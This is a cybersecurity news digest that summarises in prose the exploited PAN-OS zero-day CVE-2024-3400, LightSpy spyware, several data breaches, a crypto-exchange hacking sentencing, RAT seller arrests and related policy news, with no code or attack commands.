Daily Brief

Palo Alto Networks has addressed a zero-day vulnerability, tagged as CVE-2024-3400, affecting several versions of their PAN-OS firewalls including PAN-OS 10.2, 11.0, and 11.1. The vulnerability, exploited actively since March 26, allowed unauthenticated attackers remote root code execution on targeted devices without user interaction. Hotfixes have been issued for the affected versions, with additional updates pending for other versions. The zero-day exploit was utilized to install backdoor access via command injection, facilitating network breaches and data theft, possibly by state-sponsored actors identified as UTA0218. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has recognized the urgency of the breach, adding the vulnerability to its Known Exploited Vulnerabilities catalog. Security measures recommended include disabling device telemetry until patches are applied and activating threat mitigation tools for those with 'Threat Prevention' subscriptions. Over 82,000 PAN-OS devices were found exposed, with a significant portion located in the United States.

Just-in-Time (JIT) privileged access management is growing as a method to control risks of privilege misuse by providing temporary and necessary access rather than continuous high-level privileges. JIT aligns with the principle of least privilege, providing only minimum necessary access to users for the duration needed to perform tasks, which minimizes the risk of privilege escalation and credential-based attacks. Standing privileges are eliminated in JIT provisioning, reducing the opportunities for attackers to exploit inactive accounts and interrupting reconnaissance activities. Safeguard, a privileged access management solution, supports JIT provisioning, enabling organizations to manage account activation and access rights dynamically in response to specific access requests. Active Roles ARS enhances JIT provisioning by automating account activation, group membership management, and attribute synchronization across Active Directory. The combination of Safeguard and Active Roles allows for sophisticated JIT provisioning configurations that strengthen security and reduce potential security threats. Implementing JIT provisioning is vital for a comprehensive privileged access management strategy, reducing privilege misuse and ensuring temporary access to resources only when necessary.

Cybersecurity experts have uncovered an advanced espionage campaign using LightSpy iOS spyware targeting South Asian iPhone users. This malware, known as "F_Warehouse," features a modular structure capable of functions such as file theft, surveillance, and data extraction from multiple applications. The spyware is believed to be spread through compromised news websites frequently visited by the targets. Strong links have been identified between LightSpy and DragonEgg Android spyware, attributed to Chinese nation-state group APT41. The expansive capabilities of LightSpy include accessing contacts, recording VoIP calls, and hijacking camera and microphone functions. This version of LightSpy employs advanced techniques like certificate pinning to avoid detection and enhance communication security with its command and control servers. Evidence, such as native Chinese language in the code and server connections to a Chinese IP, suggests possible state-sponsored origins of this spyware. Apple has issued warnings to users across 92 countries, including India, about potential targeting by this sophisticated spyware.

Palo Alto Networks has released critical hotfixes for a high-severity vulnerability in PAN-OS, actively exploited in the wild. The vulnerability, identified as CVE-2024-3400 with a CVSS score of 10.0, involves command injection allowing unauthenticated code execution. Affected versions include PAN-OS 10.2, 11.0, and 11.1, specifically configurations with GlobalProtect feature and telemetry enabled. The flaw has been used to deploy a Python-based backdoor named UPSTYLE, enabling attackers to execute arbitrary commands. Threat actor UTA0218, tracked by Volexity as the group behind the exploitation, has been active since at least March 26, 2024. Exploits documented include deploying further payloads for data exfiltration, log removal, and reverse shell creation. Palo Alto Network's response includes updates with more scheduled releases for various maintenance versions in the coming days. There is still uncertainty about the full scope of system compromises due to this vulnerability.

Andy Grayland, CISO at Silobreaker, to address the escalating risks associated with third-party partners in a webinar scheduled for 18 April. The session will explore strategies for utilizing real-time threat intelligence to identify and mitigate third-party risks. Emphasis on the importance of understanding what data can be collected and how it integrates with internal data sources to enhance security postures. Discussion to cover methods to effectively manage and minimize organizational risks through collaboration with partners. The webinar aims to provide actionable insights on how to improve defenses against the vulnerabilities introduced by third parties in supply chains. Registration is open for the webinar, which promises guidance from a seasoned security expert on evolving cyberthreat landscapes.

The U.S. House of Representatives approved the renewal of Section 702 of the FISA, allowing continued warrantless surveillance. Despite bipartisan concerns and a proposed amendment requiring warrants for surveillance of US citizens, the amendment did not pass, with a tie vote of 212-212. Dutch chipmaker Nexperia, owned by Chinese firm Wingtech, faced a cyberattack with potentially hundreds of gigabytes of data compromised and leaked online. A Microsoft-signed executable revealed to be a backdoor, underscoring risks even with trusted signatures. CISA has enhanced its malware analysis system, allowing expanded capabilities for detecting and analyzing malicious software with the help of submissions from authorized entities. CISA also issued an alert regarding Sisense, a data analytics company compromised through credentials stolen from an unprotected Amazon S3 bucket, affecting major clients like Nasdaq. These incidents highlight ongoing and varied challenges in cybersecurity, from legislative debates over privacy to critical vulnerabilities and international cyberattacks.

OpenTable initially planned to display members' first names and profile pictures on both old and new reviews. The decision was met with significant backlash from members concerned about privacy and potential negative repercussions from restaurant owners. In response to the feedback, OpenTable will keep old reviews anonymous but will implement the first name and photo policy for new reviews. The changes were set to launch on May 22, but OpenTable has postponed the implementation without providing a new specific date. Before the policy is implemented, OpenTable encourages users to update their profiles with the preferred first name and photo for future reviews. OpenTable aims to enhance transparency and trust in reviews but has adjusted its approach based on community response.

Shakeeb Ahmed, a former security engineer, was sentenced to three years in prison for hacking two cryptocurrency exchanges and stealing over $12.3 million. Ahmed pleaded guilty to computer fraud and exploited a security flaw in the exchanges' smart contracts to manipulate transactions and withdraw inflated fees. The thefts occurred in July 2022, and Ahmed was arrested and charged in December 2023. After his hacks, Ahmed negotiated with the exchanges to return part of the stolen funds in exchange for not notifying law enforcement, keeping a portion as a “white hat” bounty. One of the affected platforms, Nirvana Finance, offered Ahmed a bug bounty to recover the stolen funds, which he declined, leading to the platform's shutdown. Ahmed laundered the stolen cryptocurrencies using cross-chain bridges and mixers to convert them into untraceable Monero. In addition to his prison term, Ahmed faces three years of supervised release and must forfeit around $12.3 million and pay restitution of over $5 million.

A collaboration between the Australian Federal Police (AFP) and the FBI has resulted in the arrest of two individuals linked to the creation and sale of the "Firebird" remote access trojan (RAT), which was also known as "Hive." The investigation, initiated in 2020, focused on an Australian man and Edmond Chakhmakhchyan from California, who were allegedly involved in the development and distribution of the malware. The RAT was marketed on hacking forums and websites as a legitimate remote administration tool but offered capabilities for stealthy access, password recovery from browsers, and exploiting systems to elevate privileges. The Australian suspect is charged with twelve offenses related to the production and distribution of the RAT, with potential penalties amounting to 36 years in prison. Chakhmakhchyan is accused of marketing the RAT, processing payments in Bitcoin, and providing technical support to purchasers, with a maximum sentence of ten years if convicted. Evidence includes interactions where Chakhmakhchyan promoted the RAT's illicit capabilities to an undercover FBI agent and transactions where explicit intentions for illegal use were discussed. The legal proceedings for the Australian are set for May 7, 2024, at the Downing Centre Local Court, while Chakhmakhchyan will face the U.S. court on June 4, 2024.

The U.S. Treasury Department sanctioned Hamas spokesperson Hudhayfa Samir 'Abdallah al-Kahlut for cyber influence operations. Al-Kahlut, known for leading the cyber division, procured resources in Iran to support Hamas’s online operations. He is charge of Izz al-Din al-Qassam Brigades' website hosting and has been the public spokesperson since 2007. Additionally, William Abu Shanab and Bara'a Hasan Farhat were sanctioned for their involvement in unmanned aerial vehicles (UAVs) used in terrorist activities. These sanctions are part of broader efforts by the U.S. and European Union to curb Hamas and other associated groups' terrorist capabilities. Earlier, the U.S. had sanctioned Iranian officials linked to attacks on critical infrastructure in the U.S. and other nations. The joint international sanctions aim to disrupt the operational capacities of these groups, including cyber warfare and UAV production.

Canadian retailer Giant Tiger confirmed a data breach that occurred in March 2024, impacting 2.8 million customer records. A hacker has posted the stolen data on a forum, revealing email addresses, phone numbers, and addresses of customers. The data leak also includes customer website activity details, according to the hacker. The breach was linked to a security issue involving a third-party vendor managing customer communications. Giant Tiger has notified affected customers and confirmed that no payment information or passwords were compromised. The dataset has been added to the "Have I Been Pwned?" database, allowing users to check if their information is involved. Customers are advised to be cautious of potential phishing attempts using the leaked data.

State-sponsored hackers have been exploiting a zero-day vulnerability (CVE-2024-3400) in Palo Alto Networks firewalls since March 26. The vulnerability allows unauthenticated remote code execution in the PAN-OS software, with patches announced to release on April 14. Attackers installed a custom backdoor named 'Upstyle' within the PAN-OS system to execute commands and pivot to internal networks. This backdoor interprets commands hidden in web traffic patterns, allowing extensive control over the compromised devices. Sensitive information stolen includes Windows Active Directory databases and browser data like cookies and saved login credentials. Volexity, who discovered the breach, observes that attacks are likely driven by a state-backed entity considering the sophistication and targeted nature of the attacks. This incident highlights the increasing focus of state-sponsored actors on manipulating network infrastructure devices to initiate espionage and data theft.

Royal Mail introduced barcoded stamps to boost security and prevent forgeries, but counterfeit issues continue. Senders face £5 penalties for using what the Royal Mail deems "counterfeit stamps," though many claim their stamps are legitimate. An investigation identified four major Chinese suppliers producing up to one million fake Royal Mail stamps weekly. British MPs describe the forgery on this scale as an act of economic warfare, akin to printing counterfeit money. Royal Mail blames UK Border Force for allowing counterfeit stamps into the country and admits its machines may misidentify genuine stamps. Post Office, separate from Royal Mail, insists the stamps it sells come from secured Royal Mail supplies, raising concerns about internal security. Privacy concerns about barcoded stamps were overlooked during their rollout, potentially affecting the anonymity of traditional mail. The new system, despite modernization efforts, has not successfully prevented the proliferation of counterfeit stamps.

Threat actors exploited a zero-day flaw in Palo Alto Networks' PAN-OS software identified as CVE-2024-3400, with a critical CVSS score of 10.0. The activity, named Operation MidnightEclipse, involves a Python backdoor and targeted firewalls with specific configurations enabling GlobalProtect gateway and device telemetry. Attackers managed access meticulously, creating a cron job to fetch and execute commands from an external server, affecting only specific devices. Discovered exploitation procedures include creating a reverse shell, pivoting into internal networks, and data exfiltration. Volexity, which uncovered the in-the-wild exploitation, describes UTA0218 as the moniker assigned to the highly capable threat actor possibly state-backed due to the sophistication and resources evident. U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the flaw to its KEV catalog, urging federal agencies to apply issued patches to mitigate threats. The overall intent of the attackers appears to involve stealing domain backup keys, active directory credentials, and user data such as saved cookies and login information, aiming for extensive network access and data extraction.

Palo Alto Networks issued a critical alert regarding a zero-day vulnerability in the PAN-OS software of its firewall and VPN products. The flaw, characterized by its CVSS score of 10/10, allows unauthenticated remote code execution with root privileges. Detected exploitation impacts devices configured with PAN-OS versions 10.2, 11.0, and 11.1 that have GlobalProtect gateways and device telemetry enabled. Initial reports by Volexity revealed that an attacker, named UTA0218, exploited the vulnerability to install a Python backdoor and access sensitive configuration data for lateral movement within networks. The operation, dubbed "MidnightEclipse" by Palo Alto Networks, dates back to at least March 26, 2024, with attacks observed in active continuation. Mitigations include applying a GlobalProtect-specific vulnerability protection or temporarily disabling device telemetry until the systems are patched. Full patches for the vulnerability were promised by Palo Alto Networks to be released by April 14, alongside urgent notifications and support for affected customers.